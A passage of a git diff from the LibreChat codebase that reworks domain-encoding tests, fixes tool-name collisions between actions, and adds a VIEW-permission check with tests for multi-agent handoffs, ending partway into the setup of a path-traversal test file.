resolve(globalCache[key] || null); - }); - }; +const SEP = actionDomainSeparator; +const DELIM = actionDelimiter; +const MAX = Constants.ENCODED_DOMAIN_LENGTH; +const domainSepRegex = new RegExp(SEP, 'g'); - set = async (key, value) => { - return new Promise((resolve) => { - globalCache[key] = value; - resolve(true); - }); - }; - } +describe('domainParser', () => { + describe('nullish input', () => { + it.each([null, undefined, ''])('returns undefined for %j', async (input) => { + expect(await domainParser(input, true)).toBeUndefined(); + expect(await domainParser(input, false)).toBeUndefined(); + }); + }); - return new KeyvMongo('', { - namespace: CacheKeys.ENCODED_DOMAINS, - ttl: 0, + describe('short-path encoding (hostname ≤ threshold)', () => { + it.each([ + ['examp.com', `examp${SEP}com`], + ['swapi.tech', `swapi${SEP}tech`], + ['a.b', `a${SEP}b`], + ])('replaces dots in %s → %s', async (domain, expected) => { + expect(await domainParser(domain, true)).toBe(expected); + }); + + it('handles domain exactly at threshold length', async () => { + const domain = 'a'.repeat(MAX - 4) + '.com'; + expect(domain).toHaveLength(MAX); + const result = await domainParser(domain, true); + expect(result).toBe(domain.replace(/\./g, SEP)); + }); + }); + + describe('base64-path encoding (hostname > threshold)', () => { + it('produces a key of exactly ENCODED_DOMAIN_LENGTH chars', async () => { + const result = await domainParser('api.example.com', true); + expect(result).toHaveLength(MAX); + }); + + it('encodes hostname, not full URL', async () => { + const hostname = 'api.example.com'; + const expectedKey = Buffer.from(hostname).toString('base64').substring(0, MAX); + expect(await domainParser(hostname, true)).toBe(expectedKey); + }); + + it('populates decode cache for round-trip', async () => { + const hostname = 'longdomainname.com'; + const key = await domainParser(hostname, true); + + expect(mockDomainCache[key]).toBe(Buffer.from(hostname).toString('base64')); + expect(await domainParser(key, false)).toBe(hostname); + }); + }); + + describe('protocol stripping', () => { + it('https:// URL and bare hostname produce identical encoding', async () => { + const encoded = await domainParser('https://swapi.tech', true); + expect(encoded).toBe(await domainParser('swapi.tech', true)); + expect(encoded).toBe(`swapi${SEP}tech`); + }); + + it('http:// URL and bare hostname produce identical encoding', async () => { + const encoded = await domainParser('http://api.example.com', true); + expect(encoded).toBe(await domainParser('api.example.com', true)); + }); + + it('different https:// domains produce unique keys', async () => { + const keys = await Promise.all([ + domainParser('https://api.example.com', true), + domainParser('https://api.weather.com', true), + domainParser('https://data.github.com', true), + ]); + const unique = new Set(keys); + expect(unique.size).toBe(keys.length); + }); + + it('long hostname after stripping still uses base64 path', async () => { + const result = await domainParser('https://api.example.com', true); + expect(result).toHaveLength(MAX); + expect(result).not.toContain(SEP); + }); + + it('short hostname after stripping uses dot-replacement path', async () => { + const result = await domainParser('https://a.b.c', true); + expect(result).toBe(`a${SEP}b${SEP}c`); + }); + + it('strips path and query from full URL before encoding', async () => { + const result = await domainParser('https://api.example.com/v1/endpoint?foo=bar', true); + expect(result).toBe(await domainParser('api.example.com', true)); + }); + }); + + describe('unicode domains', () => { + it('encodes unicode hostname via base64 path', async () => { + const domain = 'täst.example.com'; + const result = await domainParser(domain, true); + expect(result).toHaveLength(MAX); + expect(result).toBe(Buffer.from(domain).toString('base64').substring(0, MAX)); + }); + + it('round-trips unicode hostname through encode then decode', async () => { + const domain = 'täst.example.com'; + const key = await domainParser(domain, true); + expect(await domainParser(key, false)).toBe(domain); + }); + + it('strips protocol before encoding unicode hostname', async () => { + const withProto = 'https://täst.example.com'; + const bare = 'täst.example.com'; + expect(await domainParser(withProto, true)).toBe(await domainParser(bare, true)); + }); + }); + + describe('decode path', () => { + it('short-path encoded domain decodes via separator replacement', async () => { + expect(await domainParser(`examp${SEP}com`, false)).toBe('examp.com'); + }); + + it('base64-path encoded domain decodes via cache lookup', async () => { + const hostname = 'api.example.com'; + const key = await domainParser(hostname, true); + expect(await domainParser(key, false)).toBe(hostname); + }); + + it('returns input unchanged for unknown non-separator strings', async () => { + expect(await domainParser('not_base64_encoded', false)).toBe('not_base64_encoded'); + }); + + it('returns a string without throwing for corrupt cache entries', async () => { + mockDomainCache['corrupt_key'] = '!!!'; + const result = await domainParser('corrupt_key', false); + expect(typeof result).toBe('string'); }); }); }); -describe('domainParser', () => { - const TLD = '.com'; - - // Non-azure request - it('does not return domain as is if not azure', async () => { - const domain = `example.com${actionDomainSeparator}test${actionDomainSeparator}`; - const result1 = await domainParser(domain, false); - const result2 = await domainParser(domain, true); - expect(result1).not.toEqual(domain); - expect(result2).not.toEqual(domain); +describe('legacyDomainEncode', () => { + it.each(['', null, undefined])('returns empty string for %j', (input) => { + expect(legacyDomainEncode(input)).toBe(''); }); - // Test for Empty or Null Inputs - it('returns undefined for null domain input', async () => { - const result = await domainParser(null, true); - expect(result).toBeUndefined(); + it('is synchronous (returns a string, not a Promise)', () => { + const result = legacyDomainEncode('examp.com'); + expect(result).toBe(`examp${SEP}com`); + expect(result).not.toBeInstanceOf(Promise); }); - it('returns undefined for empty domain input', async () => { - const result = await domainParser('', true); - expect(result).toBeUndefined(); + it('uses dot-replacement for short domains', () => { + expect(legacyDomainEncode('examp.com')).toBe(`examp${SEP}com`); }); - // Verify Correct Caching Behavior - it('caches encoded domain correctly', async () => { - const domain = 'longdomainname.com'; - const encodedDomain = Buffer.from(domain) - .toString('base64') - .substring(0, Constants.ENCODED_DOMAIN_LENGTH); - - await domainParser(domain, true); - - const cachedValue = await globalCache[encodedDomain]; - expect(cachedValue).toEqual(Buffer.from(domain).toString('base64')); + it('uses base64 prefix of full input for long domains', () => { + const domain = 'https://swapi.tech'; + const expected = Buffer.from(domain).toString('base64').substring(0, MAX); + expect(legacyDomainEncode(domain)).toBe(expected); }); - // Test for Edge Cases Around Length Threshold - it('encodes domain exactly at threshold without modification', async () => { - const domain = 'a'.repeat(Constants.ENCODED_DOMAIN_LENGTH - TLD.length) + TLD; - const expected = domain.replace(/\./g, actionDomainSeparator); - const result = await domainParser(domain, true); - expect(result).toEqual(expected); + it('all https:// URLs collide to the same key', () => { + const results = [ + legacyDomainEncode('https://api.example.com'), + legacyDomainEncode('https://api.weather.com'), + legacyDomainEncode('https://totally.different.host'), + ]; + expect(new Set(results).size).toBe(1); }); - it('encodes domain just below threshold without modification', async () => { - const domain = 'a'.repeat(Constants.ENCODED_DOMAIN_LENGTH - 1 - TLD.length) + TLD; - const expected = domain.replace(/\./g, actionDomainSeparator); - const result = await domainParser(domain, true); - expect(result).toEqual(expected); + it('matches what old domainParser would have produced', () => { + const domain = 'https://api.example.com'; + const legacy = legacyDomainEncode(domain); + expect(legacy).toBe(Buffer.from(domain).toString('base64').substring(0, MAX)); }); - // Test for Unicode Domain Names - it('handles unicode characters in domain names correctly when encoding', async () => { - const unicodeDomain = 'täst.example.com'; - const encodedDomain = Buffer.from(unicodeDomain) - .toString('base64') - .substring(0, Constants.ENCODED_DOMAIN_LENGTH); - const result = await domainParser(unicodeDomain, true); - expect(result).toEqual(encodedDomain); - }); - - it('decodes unicode domain names correctly', async () => { - const unicodeDomain = 'täst.example.com'; - const encodedDomain = Buffer.from(unicodeDomain).toString('base64'); - globalCache[encodedDomain.substring(0, Constants.ENCODED_DOMAIN_LENGTH)] = encodedDomain; // Simulate caching - - const result = await domainParser( - encodedDomain.substring(0, Constants.ENCODED_DOMAIN_LENGTH), - false, - ); - expect(result).toEqual(unicodeDomain); - }); - - // Core Functionality Tests - it('returns domain with replaced separators if no cached domain exists', async () => { - const domain = 'example.com'; - const withSeparator = domain.replace(/\./g, actionDomainSeparator); - const result = await domainParser(withSeparator, false); - expect(result).toEqual(domain); - }); - - it('returns domain with replaced separators when inverse is false and under encoding length', async () => { - const domain = 'examp.com'; - const withSeparator = domain.replace(/\./g, actionDomainSeparator); - const result = await domainParser(withSeparator, false); - expect(result).toEqual(domain); - }); - - it('replaces periods with actionDomainSeparator when inverse is true and under encoding length', async () => { - const domain = 'examp.com'; - const expected = domain.replace(/\./g, actionDomainSeparator); - const result = await domainParser(domain, true); - expect(result).toEqual(expected); - }); - - it('encodes domain when length is above threshold and inverse is true', async () => { - const domain = 'a'.repeat(Constants.ENCODED_DOMAIN_LENGTH + 1).concat('.com'); - const result = await domainParser(domain, true); - expect(result).not.toEqual(domain); - expect(result.length).toBeLessThanOrEqual(Constants.ENCODED_DOMAIN_LENGTH); - }); - - it('returns encoded value if no encoded value is cached, and inverse is false', async () => { - const originalDomain = 'example.com'; - const encodedDomain = Buffer.from( - originalDomain.replace(/\./g, actionDomainSeparator), - ).toString('base64'); - const result = await domainParser(encodedDomain, false); - expect(result).toEqual(encodedDomain); - }); - - it('decodes encoded value if cached and encoded value is provided, and inverse is false', async () => { - const originalDomain = 'example.com'; - const encodedDomain = await domainParser(originalDomain, true); - const result = await domainParser(encodedDomain, false); - expect(result).toEqual(originalDomain); - }); - - it('handles invalid base64 encoded values gracefully', async () => { - const invalidBase64Domain = 'not_base64_encoded'; - const result = await domainParser(invalidBase64Domain, false); - expect(result).toEqual(invalidBase64Domain); + it('produces same result as new domainParser for short bare hostnames', async () => { + const domain = 'swapi.tech'; + expect(legacyDomainEncode(domain)).toBe(await domainParser(domain, true)); + }); +}); + +describe('validateAndUpdateTool', () => { + const mockReq = { user: { id: 'user123' } }; + + it('returns tool unchanged when name passes tool-name regex', async () => { + const tool = { function: { name: 'getPeople_action_swapi---tech' } }; + const result = await validateAndUpdateTool({ + req: mockReq, + tool, + assistant_id: 'asst_1', + }); + expect(result).toEqual(tool); + expect(getActions).not.toHaveBeenCalled(); + }); + + it('matches action when metadata.domain has https:// prefix and tool domain is bare hostname', async () => { + getActions.mockResolvedValue([{ metadata: { domain: 'https://api.example.com' } }]); + + const tool = { function: { name: `getPeople${DELIM}api.example.com` } }; + const result = await validateAndUpdateTool({ + req: mockReq, + tool, + assistant_id: 'asst_1', + }); + + expect(result).not.toBeNull(); + expect(result.function.name).toMatch(/^getPeople_action_/); + expect(result.function.name).not.toContain('.'); + }); + + it('matches action when metadata.domain has no protocol', async () => { + getActions.mockResolvedValue([{ metadata: { domain: 'api.example.com' } }]); + + const tool = { function: { name: `getPeople${DELIM}api.example.com` } }; + const result = await validateAndUpdateTool({ + req: mockReq, + tool, + assistant_id: 'asst_1', + }); + + expect(result).not.toBeNull(); + expect(result.function.name).toMatch(/^getPeople_action_/); + }); + + it('returns null when no action matches the domain', async () => { + getActions.mockResolvedValue([{ metadata: { domain: 'https://other.domain.com' } }]); + + const tool = { function: { name: `getPeople${DELIM}api.example.com` } }; + const result = await validateAndUpdateTool({ + req: mockReq, + tool, + assistant_id: 'asst_1', + }); + + expect(result).toBeNull(); + }); + + it('returns null when action has no metadata', async () => { + getActions.mockResolvedValue([{ metadata: null }]); + + const tool = { function: { name: `getPeople${DELIM}api.example.com` } }; + const result = await validateAndUpdateTool({ + req: mockReq, + tool, + assistant_id: 'asst_1', + }); + + expect(result).toBeNull(); + }); +}); + +describe('backward-compatible tool name matching', () => { + function normalizeToolName(name) { + return name.replace(domainSepRegex, '_'); + } + + function buildToolName(functionName, encodedDomain) { + return `${functionName}${DELIM}${encodedDomain}`; + } + + describe('definition-phase matching', () => { + it('new encoding matches agent tools stored with new encoding', async () => { + const metadataDomain = 'https://swapi.tech'; + const encoded = await domainParser(metadataDomain, true); + const normalized = normalizeToolName(encoded); + + const storedTool = buildToolName('getPeople', encoded); + const defToolName = `getPeople${DELIM}${normalized}`; + + expect(normalizeToolName(storedTool)).toBe(defToolName); + }); + + it('legacy encoding matches agent tools stored with legacy encoding', async () => { + const metadataDomain = 'https://swapi.tech'; + const legacy = legacyDomainEncode(metadataDomain); + const legacyNormalized = normalizeToolName(legacy); + + const storedTool = buildToolName('getPeople', legacy); + const legacyDefName = `getPeople${DELIM}${legacyNormalized}`; + + expect(normalizeToolName(storedTool)).toBe(legacyDefName); + }); + + it('new definition matches old stored tools via legacy fallback', async () => { + const metadataDomain = 'https://swapi.tech'; + const newDomain = await domainParser(metadataDomain, true); + const legacyDomain = legacyDomainEncode(metadataDomain); + const newNorm = normalizeToolName(newDomain); + const legacyNorm = normalizeToolName(legacyDomain); + + const oldStoredTool = buildToolName('getPeople', legacyDomain); + const newToolName = `getPeople${DELIM}${newNorm}`; + const legacyToolName = `getPeople${DELIM}${legacyNorm}`; + + const storedNormalized = normalizeToolName(oldStoredTool); + const hasMatch = storedNormalized === newToolName || storedNormalized === legacyToolName; + expect(hasMatch).toBe(true); + }); + + it('pre-normalized Set eliminates per-tool normalization', async () => { + const metadataDomain = 'https://api.example.com'; + const domain = await domainParser(metadataDomain, true); + const legacyDomain = legacyDomainEncode(metadataDomain); + const normalizedDomain = normalizeToolName(domain); + const legacyNormalized = normalizeToolName(legacyDomain); + + const storedTools = [ + buildToolName('getWeather', legacyDomain), + buildToolName('getForecast', domain), + ]; + + const preNormalized = new Set(storedTools.map((t) => normalizeToolName(t))); + + const toolName = `getWeather${DELIM}${normalizedDomain}`; + const legacyToolName = `getWeather${DELIM}${legacyNormalized}`; + expect(preNormalized.has(toolName) || preNormalized.has(legacyToolName)).toBe(true); + }); + }); + + describe('execution-phase tool lookup', () => { + it('model-called tool name resolves via normalizedToDomain map (new encoding)', async () => { + const metadataDomain = 'https://api.example.com'; + const domain = await domainParser(metadataDomain, true); + const normalized = normalizeToolName(domain); + + const normalizedToDomain = new Map(); + normalizedToDomain.set(normalized, domain); + + const modelToolName = `getWeather${DELIM}${normalized}`; + + let matched = ''; + for (const [norm, canonical] of normalizedToDomain.entries()) { + if (modelToolName.includes(norm)) { + matched = canonical; + break; + } + } + + expect(matched).toBe(domain); + + const functionName = modelToolName.replace(`${DELIM}${normalizeToolName(matched)}`, ''); + expect(functionName).toBe('getWeather'); + }); + + it('model-called tool name resolves via legacy entry in normalizedToDomain map', async () => { + const metadataDomain = 'https://api.example.com'; + const domain = await domainParser(metadataDomain, true); + const legacyDomain = legacyDomainEncode(metadataDomain); + const legacyNorm = normalizeToolName(legacyDomain); + + const normalizedToDomain = new Map(); + normalizedToDomain.set(normalizeToolName(domain), domain); + normalizedToDomain.set(legacyNorm, domain); + + const legacyModelToolName = `getWeather${DELIM}${legacyNorm}`; + + let matched = ''; + for (const [norm, canonical] of normalizedToDomain.entries()) { + if (legacyModelToolName.includes(norm)) { + matched = canonical; + break; + } + } + + expect(matched).toBe(domain); + }); + + it('legacy guard skips duplicate map entry for short bare hostnames', async () => { + const domain = 'swapi.tech'; + const newEncoding = await domainParser(domain, true); + const legacyEncoding = legacyDomainEncode(domain); + + expect(newEncoding).toBe(legacyEncoding); + + const normalizedToDomain = new Map(); + normalizedToDomain.set(newEncoding, newEncoding); + if (legacyEncoding !== newEncoding) { + normalizedToDomain.set(legacyEncoding, newEncoding); + } + expect(normalizedToDomain.size).toBe(1); + }); + }); + + describe('processRequiredActions matching (assistants path)', () => { + it('legacy tool from OpenAI matches via normalizedToDomain with both encodings', async () => { + const metadataDomain = 'https://swapi.tech'; + const domain = await domainParser(metadataDomain, true); + const legacyDomain = legacyDomainEncode(metadataDomain); + + const normalizedToDomain = new Map(); + normalizedToDomain.set(domain, domain); + if (legacyDomain !== domain) { + normalizedToDomain.set(legacyDomain, domain); + } + + const legacyToolName = buildToolName('getPeople', legacyDomain); + + let currentDomain = ''; + let matchedKey = ''; + for (const [key, canonical] of normalizedToDomain.entries()) { + if (legacyToolName.includes(key)) { + currentDomain = canonical; + matchedKey = key; + break; + } + } + + expect(currentDomain).toBe(domain); + expect(matchedKey).toBe(legacyDomain); + + const functionName = legacyToolName.replace(`${DELIM}${matchedKey}`, ''); + expect(functionName).toBe('getPeople'); + }); + + it('new tool name matches via the canonical domain key', async () => { + const metadataDomain = 'https://swapi.tech'; + const domain = await domainParser(metadataDomain, true); + const legacyDomain = legacyDomainEncode(metadataDomain); + + const normalizedToDomain = new Map(); + normalizedToDomain.set(domain, domain); + if (legacyDomain !== domain) { + normalizedToDomain.set(legacyDomain, domain); + } + + const newToolName = buildToolName('getPeople', domain); + + let currentDomain = ''; + let matchedKey = ''; + for (const [key, canonical] of normalizedToDomain.entries()) { + if (newToolName.includes(key)) { + currentDomain = canonical; + matchedKey = key; + break; + } + } + + expect(currentDomain).toBe(domain); + expect(matchedKey).toBe(domain); + + const functionName = newToolName.replace(`${DELIM}${matchedKey}`, ''); + expect(functionName).toBe('getPeople'); + }); + }); + + describe('save-route cleanup', () => { + it('tool filter removes tools matching new encoding', async () => { + const metadataDomain = 'https://swapi.tech'; + const domain = await domainParser(metadataDomain, true); + const legacyDomain = legacyDomainEncode(metadataDomain); + + const tools = [ + buildToolName('getPeople', domain), + buildToolName('unrelated', 'other---domain'), + ]; + + const filtered = tools.filter((t) => !t.includes(domain) && !t.includes(legacyDomain)); + + expect(filtered).toEqual([buildToolName('unrelated', 'other---domain')]); + }); + + it('tool filter removes tools matching legacy encoding', async () => { + const metadataDomain = 'https://swapi.tech'; + const domain = await domainParser(metadataDomain, true); + const legacyDomain = legacyDomainEncode(metadataDomain); + + const tools = [ + buildToolName('getPeople', legacyDomain), + buildToolName('unrelated', 'other---domain'), + ]; + + const filtered = tools.filter((t) => !t.includes(domain) && !t.includes(legacyDomain)); + + expect(filtered).toEqual([buildToolName('unrelated', 'other---domain')]); + }); + }); + + describe('delete-route domain extraction', () => { + it('domain extracted from actions array is usable as-is for tool filtering', async () => { + const metadataDomain = 'https://api.example.com'; + const domain = await domainParser(metadataDomain, true); + const actionId = 'abc123'; + const actionEntry = `${domain}${DELIM}${actionId}`; + + const [storedDomain] = actionEntry.split(DELIM); + expect(storedDomain).toBe(domain); + + const tools = [buildToolName('getWeather', domain), buildToolName('getPeople', 'other')]; + + const filtered = tools.filter((t) => !t.includes(storedDomain)); + expect(filtered).toEqual([buildToolName('getPeople', 'other')]); + }); + }); + + describe('multi-action agents (collision scenario)', () => { + it('two https:// actions now produce distinct tool names', async () => { + const domain1 = await domainParser('https://api.weather.com', true); + const domain2 = await domainParser('https://api.spacex.com', true); + + const tool1 = buildToolName('getData', domain1); + const tool2 = buildToolName('getData', domain2); + + expect(tool1).not.toBe(tool2); + }); + + it('two https:// actions used to collide in legacy encoding', () => { + const legacy1 = legacyDomainEncode('https://api.weather.com'); + const legacy2 = legacyDomainEncode('https://api.spacex.com'); + + const tool1 = buildToolName('getData', legacy1); + const tool2 = buildToolName('getData', legacy2); + + expect(tool1).toBe(tool2); + }); }); }); diff --git a/api/server/services/Endpoints/agents/addedConvo.js b/api/server/services/Endpoints/agents/addedConvo.js index 25b1327991..11b87e450e 100644 --- a/api/server/services/Endpoints/agents/addedConvo.js +++ b/api/server/services/Endpoints/agents/addedConvo.js @@ -1,6 +1,7 @@ const { logger } = require('@librechat/data-schemas'); const { initializeAgent, validateAgentModel } = require('@librechat/api'); const { loadAddedAgent, setGetAgent, ADDED_AGENT_ID } = require('~/models/loadAddedAgent'); +const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions'); const { getConvoFiles } = require('~/models/Conversation'); const { getAgent } = require('~/models/Agent'); const db = require('~/models'); @@ -108,6 +109,7 @@ const processAddedConvo = async ({ getUserKeyValues: db.getUserKeyValues, getToolFilesByIds: db.getToolFilesByIds, getCodeGeneratedFiles: db.getCodeGeneratedFiles, + filterFilesByAgentAccess, }, ); diff --git a/api/server/services/Endpoints/agents/initialize.js b/api/server/services/Endpoints/agents/initialize.js index e71270ef85..08f631c3d2 100644 --- a/api/server/services/Endpoints/agents/initialize.js +++ b/api/server/services/Endpoints/agents/initialize.js @@ -10,6 +10,8 @@ const { createSequentialChainEdges, } = require('@librechat/api'); const { + ResourceType, + PermissionBits, EModelEndpoint, isAgentsEndpoint, getResponseSender, @@ -20,7 +22,9 @@ const { getDefaultHandlers, } = require('~/server/controllers/agents/callbacks'); const { loadAgentTools, loadToolsForExecution } = require('~/server/services/ToolService'); +const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions'); const { getModelsConfig } = require('~/server/controllers/ModelController'); +const { checkPermission } = require('~/server/services/PermissionService'); const AgentClient = require('~/server/controllers/agents/client'); const { getConvoFiles } = require('~/models/Conversation'); const { processAddedConvo } = require('./addedConvo'); @@ -125,6 +129,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => { toolRegistry: ctx.toolRegistry, userMCPAuthMap: ctx.userMCPAuthMap, tool_resources: ctx.tool_resources, + actionsEnabled: ctx.actionsEnabled, }); logger.debug(`[ON_TOOL_EXECUTE] loaded ${result.loadedTools?.length ?? 0} tools`); @@ -200,6 +205,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => { getUserCodeFiles: db.getUserCodeFiles, getToolFilesByIds: db.getToolFilesByIds, getCodeGeneratedFiles: db.getCodeGeneratedFiles, + filterFilesByAgentAccess, }, ); @@ -211,6 +217,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => { toolRegistry: primaryConfig.toolRegistry, userMCPAuthMap: primaryConfig.userMCPAuthMap, tool_resources: primaryConfig.tool_resources, + actionsEnabled: primaryConfig.actionsEnabled, }); const agent_ids = primaryConfig.agent_ids; @@ -229,6 +236,22 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => { return null; } + const hasAccess = await checkPermission({ + userId: req.user.id, + role: req.user.role, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + requiredPermission: PermissionBits.VIEW, + }); + + if (!hasAccess) { + logger.warn( + `[processAgent] User ${req.user.id} lacks VIEW access to handoff agent ${agentId}, skipping`, + ); + skippedAgentIds.add(agentId); + return null; + } + const validationResult = await validateAgentModel({ req, res, @@ -263,6 +286,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => { getUserCodeFiles: db.getUserCodeFiles, getToolFilesByIds: db.getToolFilesByIds, getCodeGeneratedFiles: db.getCodeGeneratedFiles, + filterFilesByAgentAccess, }, ); @@ -278,6 +302,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => { toolRegistry: config.toolRegistry, userMCPAuthMap: config.userMCPAuthMap, tool_resources: config.tool_resources, + actionsEnabled: config.actionsEnabled, }); agentConfigs.set(agentId, config); @@ -351,6 +376,19 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => { userMCPAuthMap = updatedMCPAuthMap; } + for (const [agentId, config] of agentConfigs) { + if (agentToolContexts.has(agentId)) { + continue; + } + agentToolContexts.set(agentId, { + agent: config, + toolRegistry: config.toolRegistry, + userMCPAuthMap: config.userMCPAuthMap, + tool_resources: config.tool_resources, + actionsEnabled: config.actionsEnabled, + }); + } + // Ensure edges is an array when we have multiple agents (multi-agent mode) // MultiAgentGraph.categorizeEdges requires edges to be iterable if (agentConfigs.size > 0 && !edges) { diff --git a/api/server/services/Endpoints/agents/initialize.spec.js b/api/server/services/Endpoints/agents/initialize.spec.js new file mode 100644 index 0000000000..16b41aca65 --- /dev/null +++ b/api/server/services/Endpoints/agents/initialize.spec.js @@ -0,0 +1,201 @@ +const mongoose = require('mongoose'); +const { + ResourceType, + PermissionBits, + PrincipalType, + PrincipalModel, +} = require('librechat-data-provider'); +const { MongoMemoryServer } = require('mongodb-memory-server'); + +const mockInitializeAgent = jest.fn(); +const mockValidateAgentModel = jest.fn(); + +jest.mock('@librechat/agents', () => ({ + ...jest.requireActual('@librechat/agents'), + createContentAggregator: jest.fn(() => ({ + contentParts: [], + aggregateContent: jest.fn(), + })), +})); + +jest.mock('@librechat/api', () => ({ + ...jest.requireActual('@librechat/api'), + initializeAgent: (...args) => mockInitializeAgent(...args), + validateAgentModel: (...args) => mockValidateAgentModel(...args), + GenerationJobManager: { setCollectedUsage: jest.fn() }, + getCustomEndpointConfig: jest.fn(), + createSequentialChainEdges: jest.fn(), +})); + +jest.mock('~/server/controllers/agents/callbacks', () => ({ + createToolEndCallback: jest.fn(() => jest.fn()), + getDefaultHandlers: jest.fn(() => ({})), +})); + +jest.mock('~/server/services/ToolService', () => ({ + loadAgentTools: jest.fn(), + loadToolsForExecution: jest.fn(), +})); + +jest.mock('~/server/controllers/ModelController', () => ({ + getModelsConfig: jest.fn().mockResolvedValue({}), +})); + +let agentClientArgs; +jest.mock('~/server/controllers/agents/client', () => { + return jest.fn().mockImplementation((args) => { + agentClientArgs = args; + return {}; + }); +}); + +jest.mock('./addedConvo', () => ({ + processAddedConvo: jest.fn().mockResolvedValue({ userMCPAuthMap: undefined }), +})); + +jest.mock('~/cache', () => ({ + logViolation: jest.fn(), +})); + +const { initializeClient } = require('./initialize'); +const { createAgent } = require('~/models/Agent'); +const { User, AclEntry } = require('~/db/models'); + +const PRIMARY_ID = 'agent_primary'; +const TARGET_ID = 'agent_target'; +const AUTHORIZED_ID = 'agent_authorized'; + +describe('initializeClient — processAgent ACL gate', () => { + let mongoServer; + let testUser; + + beforeAll(async () => { + mongoServer = await MongoMemoryServer.create(); + await mongoose.connect(mongoServer.getUri()); + }); + + afterAll(async () => { + await mongoose.disconnect(); + await mongoServer.stop(); + }); + + beforeEach(async () => { + await mongoose.connection.dropDatabase(); + jest.clearAllMocks(); + agentClientArgs = undefined; + + testUser = await User.create({ + email: 'test@example.com', + name: 'Test User', + username: 'testuser', + role: 'USER', + }); + + mockValidateAgentModel.mockResolvedValue({ isValid: true }); + }); + + const makeReq = () => ({ + user: { id: testUser._id.toString(), role: 'USER' }, + body: { conversationId: 'conv_1', files: [] }, + config: { endpoints: {} }, + _resumableStreamId: null, + }); + + const makeEndpointOption = () => ({ + agent: Promise.resolve({ + id: PRIMARY_ID, + name: 'Primary', + provider: 'openai', + model: 'gpt-4', + tools: [], + }), + model_parameters: { model: 'gpt-4' }, + endpoint: 'agents', + }); + + const makePrimaryConfig = (edges) => ({ + id: PRIMARY_ID, + endpoint: 'agents', + edges, + toolDefinitions: [], + toolRegistry: new Map(), + userMCPAuthMap: null, + tool_resources: {}, + resendFiles: true, + maxContextTokens: 4096, + }); + + it('should skip handoff agent and filter its edge when user lacks VIEW access', async () => { + await createAgent({ + id: TARGET_ID, + name: 'Target Agent', + provider: 'openai', + model: 'gpt-4', + author: new mongoose.Types.ObjectId(), + tools: [], + }); + + const edges = [{ from: PRIMARY_ID, to: TARGET_ID, edgeType: 'handoff' }]; + mockInitializeAgent.mockResolvedValue(makePrimaryConfig(edges)); + + await initializeClient({ + req: makeReq(), + res: {}, + signal: new AbortController().signal, + endpointOption: makeEndpointOption(), + }); + + expect(mockInitializeAgent).toHaveBeenCalledTimes(1); + expect(agentClientArgs.agent.edges).toEqual([]); + }); + + it('should initialize handoff agent and keep its edge when user has VIEW access', async () => { + const authorizedAgent = await createAgent({ + id: AUTHORIZED_ID, + name: 'Authorized Agent', + provider: 'openai', + model: 'gpt-4', + author: new mongoose.Types.ObjectId(), + tools: [], + }); + + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: testUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: authorizedAgent._id, + permBits: PermissionBits.VIEW, + grantedBy: testUser._id, + }); + + const edges = [{ from: PRIMARY_ID, to: AUTHORIZED_ID, edgeType: 'handoff' }]; + const handoffConfig = { + id: AUTHORIZED_ID, + edges: [], + toolDefinitions: [], + toolRegistry: new Map(), + userMCPAuthMap: null, + tool_resources: {}, + }; + + let callCount = 0; + mockInitializeAgent.mockImplementation(() => { + callCount++; + return callCount === 1 + ? Promise.resolve(makePrimaryConfig(edges)) + : Promise.resolve(handoffConfig); + }); + + await initializeClient({ + req: makeReq(), + res: {}, + signal: new AbortController().signal, + endpointOption: makeEndpointOption(), + }); + + expect(mockInitializeAgent).toHaveBeenCalledTimes(2); + expect(agentClientArgs.agent.edges).toHaveLength(1); + expect(agentClientArgs.agent.edges[0].to).toBe(AUTHORIZED_ID); + }); +}); diff --git a/api/server/services/Files/Code/__tests__/process-traversal.spec.js b/api/server/services/Files/Code/__tests__/process-traversal.spec.js new file mode 100644 index 0000000000..2db366d06b --- /dev/null +++ b/api/server/services/Files/Code/__tests__/process-traversal.spec.js @@ -0,0 +1,124 @@ +jest.mock('uuid', () => ({ v4: jest.fn(() => 'mock-uuid') })); + +jest.mock('@librechat/data-schemas', () => ({ + logger: { warn: jest.fn(), debug: jest.fn(), error: jest.fn() }, +})); + +jest.mock('@librechat/agents', () => ({ + getCodeBaseURL: jest.fn(() => 'http://localhost:8000'), +})); + +const mockSanitizeFilename = jest.fn(); + +jest.mock('@librechat/api', () => ({ + logAxiosError: jest.fn(), + getBasePath: jest.fn(() => ''), + sanitizeFilename: mockSanitizeFilename, +})); + +jest.mock('librechat-data-provider', () => ({ + ...jest.requireActual('librechat-data-provider'), + mergeFileConfig: jest.fn(() => ({ serverFileSizeLimit: 100 * 1024 * 1024 })), + getEndpointFileConfig: jest.fn(() => ({ + fileSizeLimit: 100 * 1024 * 1024, + supportedMimeTypes: ['*/*'], + })), + fileConfig: { checkType: jest.fn(() => true) }, +})); + +jest.mock('~/models', () => ({ + createFile: jest.fn().mockResolvedValue({}), + getFiles: jest.fn().mockResolvedValue([]), + updateFile: jest.fn(), + claimCodeFile: jest.fn().mockResolvedValue({ file_id: 'mock-uuid', usage: 0 }), +})); + +const mockSaveBuffer = jest.fn().mockResolvedValue('/uploads/user123/mock-uuid__output.csv'); + +jest.mock('~/server/services/Files/strategies', () => ({ + getStrategyFunctions: jest.fn(() => ({ + saveBuffer: mockSaveBuffer, + })), +})); + +jest.mock('~/server/services/Files/permissions', () => ({ + filterFilesByAgentAccess: jest.fn().mockResolvedValue([]), +})); + +jest.mock('~/server/services/Files/images/convert', () => ({ + convertImage: jest.fn(), +})); + +jest.mock('~/server/utils', () => ({ + determineFileType: jest.fn().mockResolvedValue({ mime: 'text/csv' }), +})); + +jest.mock('axios', () => + jest.fn().mockResolvedValue({ + data: Buffer.from('file-content'), + }), +); + +const { createFile } = require('~/models'); +const { processCodeOutput } = require('../process'); + +const baseParams = { + req: { + user: { id: 'user123' }, + config: { + fileStrategy: 'local', + imageOutputType: 'webp', + fileConfig: {}, + }, + }, + id: 